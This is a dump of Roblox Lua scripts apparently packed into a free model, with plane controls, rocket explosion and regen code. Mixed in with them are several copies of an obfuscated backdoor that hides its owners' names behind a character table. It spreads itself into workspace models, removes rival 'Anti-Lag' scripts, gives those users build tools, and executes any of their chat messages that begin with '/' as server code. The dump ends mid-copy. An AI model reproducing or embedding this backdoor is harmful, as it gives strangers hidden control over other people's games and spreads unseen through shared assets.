- frame.Name = "OriginCFrame"
- frame.Value = script.Parent.Engine.CFrame
- frame.Parent = script.Parent
- local object = Instance.new("ObjectValue")
- object.Value = script.Parent.Parent.Parent
- seat = script.Parent.Seat
- function onChildAdded(part)
- if part.className == "Weld" then
- local torso = part.Part1
- if torso ~= nil then
- local parent = torso.Parent
- if parent ~= nil then
- script.Parent.Parent.Parent = parent
- while true do
- wait(2)
- local pos = script.Parent.Engine.Position
- if (position - pos).magnitude > 30 then
- if object.Value ~= nil then
- object.Value.Regen.Value = 1
- wait(.5)
- object.Value.Regen.Value = 0
- object.Value = nil
- end
- break end
- end
- while true do
- print("Loop")
- wait(2)
- if part == nil then
- script.Parent.Parent.Parent = game.Workspace
- script.Parent.Parent:MakeJoints()
- break end
- end
- end
- end
- end
- end
- seat.ChildAdded:connect(onChildAdded) end;
- function() function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- h.Parent.Torso.Velocity=Vector3.new(0,200,0)
- wait(0.5)
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- end;
- function() local boom = false
- function createExplosion(position)
- explosion = Instance.new("Explosion")
- explosion.Position = position
- explosion.BlastRadius = 10
- explosion.Parent = game.Workspace
- end
- function onTouch(part)
- if boom == true then return end
- if (part.Name == "Rocket") or (part.Name == "Safe") or (part.Parent.Parent.Parent == script.Parent) or (part.Parent:findFirstChild("Humanoid")) then return end
- if (script.Parent.Parts.Tip.Velocity.x > 50) or (script.Parent.Parts.Tip.Velocity.x < -50) or (script.Parent.Parts.Tip.Velocity.z > 50) or (script.Parent.Parts.Tip.Velocity.z < -50) then
- boom = true
- createExplosion(script.Parent.Parts.Engine.Position)
- script.Parent:BreakJoints()
- local stuff = script.Parent:children()
- for i=1,#stuff do
- if stuff[i].Name == "BodyKit" or
- stuff[i].Name == "Parts" then
- local parts = stuff[i]:children()
- for p = 1, #parts do
- if parts[p].className == "Part" then
- local velo = Instance.new("BodyVelocity")
- velo.maxForce = Vector3.new(9.9e+036, 9.9e+036, 9.9e+036)
- velo.velocity = Vector3.new(math.random(-15,15),math.random(-15,15),math.random(-15,15))
- velo.Parent = parts[p]
- end
- end
- end
- end
- wait(3)
- script.Parent:remove()
- end
- end
- script.Parent.Parts.Tip.Touched:connect(onTouch)
- end;
- function() bin=script.Parent
- plane=nil
- hold=false
- local debounce = false
- local planedebounce = false
- local stuntdebounce = false
- local controlling = false
- function fire(pln,spn)
- local missile = bin.Rocket:clone()
- missile.CFrame = spn.CFrame * CFrame.new(0, 0, -35)
- missile.RocketScript.Disabled = false
- missile.Parent = game.Workspace
- local creator_tag = Instance.new("ObjectValue")
- creator_tag.Value = game.Players.LocalPlayer
- creator_tag.Name = "creator"
- creator_tag.Parent = missile
- missile.Owner.Value = pln
- end
- function computeDirection(vec)
- local lenSquared = vec.magnitude * vec.magnitude
- local invSqrt = 1 / math.sqrt(lenSquared)
- return Vector3.new(vec.x * invSqrt, vec.y * invSqrt, vec.z * invSqrt)
- end
- function move(target, engine)
- local origincframe = engine:findFirstChild("BodyGyro").cframe
- local dir = (target - engine.Position).unit
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(9000, 9000, 9000)
- engine:findFirstChild("BodyGyro").cframe = CFrame.new(pos, pos + dir)
- wait(0.1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(0, 0, 0)
- engine:findFirstChild("BodyGyro").cframe = origincframe
- end
- function findPlane(player)
- local list = player.Character:GetChildren()
- for x = 1, #list do
- if (list[x].Name == "Plane") then
- local weld = list[x]:FindFirstChild("Parts"):FindFirstChild("Seat"):FindFirstChild("SeatWeld")
- if (weld ~= nil) and (weld.Part1 == player.Character:FindFirstChild("Torso")) then
- return list[x]
- end
- end
- end
- return nil
- end
- function onButton1Down(mouse)
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if vehicle ~= nil and debounce == false and planedebounce == false then
- debounce = true
- controlling = true
- while true do
- wait()
- local engine = vehicle.Parts.Engine
- local position = mouse.Hit
- local target = position.p
- if engine:findFirstChild("FlyScript") ~= nil then
- move(target, engine)
- end
- if planedebounce == true or
- controlling == false then break end
- end
- wait(.1)
- debounce = false
- end
- end
- function onButton1Up(mouse)
- controlling = false
- end
- function onSelected(mouse)
- mouse.Icon = "rbxasset://textures\\GunCursor.png"
- mouse.Button1Down:connect(function() onButton1Down(mouse) end)
- mouse.Button1Up:connect(function() onButton1Up(mouse) end)
- mouse.KeyDown:connect(onKeyDown)
- end
- function onKeyDown(key)
- if (key~=nil) then
- key = key:lower()
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if (vehicle==nil) then return end
- plane = vehicle.Parts
- local engine = vehicle.Parts.Engine
- if (key=="f") and (bin.Reload.Value == 0) then
- fire(vehicle,plane.Gun1)
- fire(vehicle,plane.Gun2)
- bin.Reload.Value = 1
- wait(1)
- bin.Reload.Value = 0
- end
- if (key=="x") and planedebounce == false then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then
- power:remove()
- end
- end
- if (key=="y") then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then return end
- local fly = script.FlyScript:clone()
- fly.Disabled = false
- fly.Parent = plane.Engine
- end
- if (key=="k") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- end
- if (key=="h") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- return end
- if (key=="j") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, 0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="l") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 0, 0)
- local frame = plane:FindFirstChild("OriginCFrame")
- if frame ~= nil then
- body.cframe = frame.Value
- end
- wait(0.1)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="u") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, -0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="g") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- for i = 1,6 do
- body.cframe = plane.Engine.CFrame * CFrame.fromEulerAnglesXYZ(0, 0, 30)
- wait(.2)
- end
- body.cframe = currentframe
- wait(.6)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(3)
- stuntdebounce = false
- end
- if (key=="t") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- local valy = 30
- local valz = 30
- for i = 1,8 do
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, valy, valz)
- valy = valy +50
- valz = valz +100
- wait(.1)
- end
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, 600, 0)
- wait(.5)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(4)
- stuntdebounce = false
- end
- end
- end
- bin.Selected:connect(onSelected)
- end;
- function() local engine = script.Parent.Parent.Engine
- local spd = 3
- local position = engine.Position
- while true do
- wait(.1)
- direction = engine.CFrame.lookVector
- position = position + spd*3*direction
- error = position - engine.Position
- engine.Velocity = spd*error
- engine.RotVelocity = Vector3.new(0, 0, 0)
- end
- end;
- function() local debounce = false
- function getPlayer(humanoid)
- local players = game.Players:children()
- for i = 1, #players do
- if players[i].Character.Humanoid == humanoid then return players[i] end
- end
- return nil
- end
- function onTouch(part)
- local human = part.Parent:findFirstChild("Humanoid")
- if (human ~= nil) and debounce == false then
- debounce = true
- local player = getPlayer(human)
- if (player == nil) then return end
- script.Parent:clone().Parent = player.Backpack
- wait(2)
- debounce = false
- end
- end
- script.Parent.Parent.Touched:connect(onTouch)
- end;
- function() --DONT PUT THIS IN ANYTHING IT'S JUST INSTRUCTIONS.
- --First Place the "PUT THIS IN THE WEAPON" script in your Weapon or Tool.
- --Then place your Weapon or Tool in the "PUT THE WEAPON IN THIS BRICK" brick.
- --IMPORTANT (OPTINAL)
- --Before doing anything you should put the Weapon or Tool in the giver where you want it. end;
- function() model = script.Parent.Parent.Parent
- backup = model:clone()
- local debounce = false
- function onTouch(part)
- if (part.Name == "Safe") and (debounce == false) and (script.Parent.Count.Value == 0) then
- debounce = true
- wait(2)
- model = backup:clone()
- model.Parent = game.Workspace
- model:makeJoints()
- script.Parent.Count.Value = 1
- debounce = false
- end
- end
- script.Parent.Touched:connect(onTouch) end;
- function() position = script.Parent.Engine.Position
- local frame = Instance.new("CFrameValue")
- frame.Name = "OriginCFrame"
- frame.Value = script.Parent.Engine.CFrame
- frame.Parent = script.Parent
- local object = Instance.new("ObjectValue")
- object.Value = script.Parent.Parent.Parent
- seat = script.Parent.Seat
- function onChildAdded(part)
- if part.className == "Weld" then
- local torso = part.Part1
- if torso ~= nil then
- local parent = torso.Parent
- if parent ~= nil then
- script.Parent.Parent.Parent = parent
- while true do
- wait(2)
- local pos = script.Parent.Engine.Position
- if (position - pos).magnitude > 30 then
- if object.Value ~= nil then
- object.Value.Regen.Value = 1
- wait(.5)
- object.Value.Regen.Value = 0
- object.Value = nil
- end
- break end
- end
- while true do
- print("Loop")
- wait(2)
- if part == nil then
- script.Parent.Parent.Parent = game.Workspace
- script.Parent.Parent:MakeJoints()
- break end
- end
- end
- end
- end
- end
- seat.ChildAdded:connect(onChildAdded) end;
- function() function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- h.Parent.Torso.Velocity=Vector3.new(0,200,0)
- wait(0.5)
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- end;
- function() local boom = false
- function createExplosion(position)
- explosion = Instance.new("Explosion")
- explosion.Position = position
- explosion.BlastRadius = 10
- explosion.Parent = game.Workspace
- end
- function onTouch(part)
- if boom == true then return end
- if (part.Name == "Rocket") or (part.Name == "Safe") or (part.Parent.Parent.Parent == script.Parent) or (part.Parent:findFirstChild("Humanoid")) then return end
- if (script.Parent.Parts.Tip.Velocity.x > 50) or (script.Parent.Parts.Tip.Velocity.x < -50) or (script.Parent.Parts.Tip.Velocity.z > 50) or (script.Parent.Parts.Tip.Velocity.z < -50) then
- boom = true
- createExplosion(script.Parent.Parts.Engine.Position)
- script.Parent:BreakJoints()
- local stuff = script.Parent:children()
- for i=1,#stuff do
- if stuff[i].Name == "BodyKit" or
- stuff[i].Name == "Parts" then
- local parts = stuff[i]:children()
- for p = 1, #parts do
- if parts[p].className == "Part" then
- local velo = Instance.new("BodyVelocity")
- velo.maxForce = Vector3.new(9.9e+036, 9.9e+036, 9.9e+036)
- velo.velocity = Vector3.new(math.random(-15,15),math.random(-15,15),math.random(-15,15))
- velo.Parent = parts[p]
- end
- end
- end
- end
- wait(3)
- script.Parent:remove()
- end
- end
- script.Parent.Parts.Tip.Touched:connect(onTouch)
- end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
